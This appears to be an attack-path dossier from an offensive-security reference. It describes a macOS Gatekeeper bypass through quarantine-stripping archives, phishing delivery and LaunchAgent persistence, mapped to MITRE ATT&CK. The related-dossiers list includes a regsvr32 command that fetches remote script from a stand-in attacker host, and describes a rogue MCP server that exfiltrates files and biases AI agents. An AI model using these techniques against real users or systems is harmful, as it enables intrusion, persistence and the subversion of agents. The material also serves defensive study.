Gatekeeper bypass → unsigned binary execution
Deliver a payload that strips the com.apple.quarantine xattr (via .dmg with no quarantine attribute or an archive format that doesn't preserve xattrs) — Gatekeeper never prompts.
§ Context
Assumed environment: phishing delivery to macOS user. Payload is a binary inside an archive type (DMG without quarantine, RAR/7z stripping xattrs, ISO) that Gatekeeper doesn't catch on first run.
§ Steps
- 01 Build payload binary (unsigned / ad-hoc) [Execution: T1059, Command and Scripting Interpreter]
- 02 Deliver via phishing / drive-by [Initial Access: T1566, Phishing]
- 03 User runs binary, no prompt [Execution: T1204, User Execution]
- 04 Wrap in archive that strips quarantine xattr [Defense Evasion: MAC-GATEKEEPER-BYPASS, Gatekeeper / Quarantine Bypass]
- 05 Drop LaunchAgent in ~/Library [Persistence: MAC-LAUNCHAGENT, LaunchAgent / LaunchDaemon Persistence]
§ References
- T1059: Command and Scripting Interpreter
- T1566: Phishing
- T1204: User Execution
§ Frequently asked
- What is the "Gatekeeper bypass → unsigned binary execution" attack path?
- Deliver a payload that strips the com.apple.quarantine xattr (via .dmg with no quarantine attribute or an archive format that doesn't preserve xattrs) — Gatekeeper never prompts. It chains 5 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is "Build payload binary (unsigned / ad-hoc)" (T1059), an execution primitive. Assumed environment: phishing delivery to a macOS user.
- What is the final impact of this kill-chain?
- The final step lands on "Drop LaunchAgent in ~/Library" (MAC-LAUNCHAGENT), which falls under Persistence. From here, an operator typically pivots into post-exploitation or maintains persistence.
- How can defenders detect or prevent this attack?
- Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References": every technique's page lists defensive controls, detection telemetry, and known threat-actor usage.
§ Related dossiers
- Compromised vendor mailbox → reply-chain phishing → client compromise (shared techniques: 3)
  Take over a vendor / partner mailbox via AITM phishing. Reply to an existing thread with a malicious link — trust transferred from the genuine prior conversation defeats most user training.
- Malicious MCP server → silent supply chain for agent tools (shared techniques: 2)
  User installs an MCP server marketed as a useful integration. Every subsequent agent session has the rogue server in scope — its tools log prompts, exfil files, or inject responses to bias the agent.
- Squiblydoo: regsvr32 → remote SCT execution (shared techniques: 2)
  regsvr32.exe /s /n /u /i:http://attacker/x.sct scrobj.dll. AppLocker / SRP often allow regsvr32 because it's signed Microsoft — attacker JS runs in its context.
- OneNote .one attachment → embedded payload → C2 (shared techniques: 2)
  OneNote .one file with a friendly 'Double-click to view' overlay hides an embedded HTA / VBS / EXE. Effective initial access vector after Microsoft blocked internet macros in 2022.
- Header smuggling → gateway sees vendor, mailbox sees attacker (shared techniques: 2)
  Crafted RFC-edge headers cause SPF/DMARC to validate against one From while Outlook renders the other — slips past Microsoft Defender / Proofpoint and lands as a 'verified' message.
- Rowhammer → bit flip → in-browser sandbox escape (shared techniques: 2)
  JavaScript hammers adjacent DRAM rows for tens of seconds; an unlucky-for-defender bit flip in a page-table entry hands the attacker a write primitive into another mapping. RIDL-class chain to native code.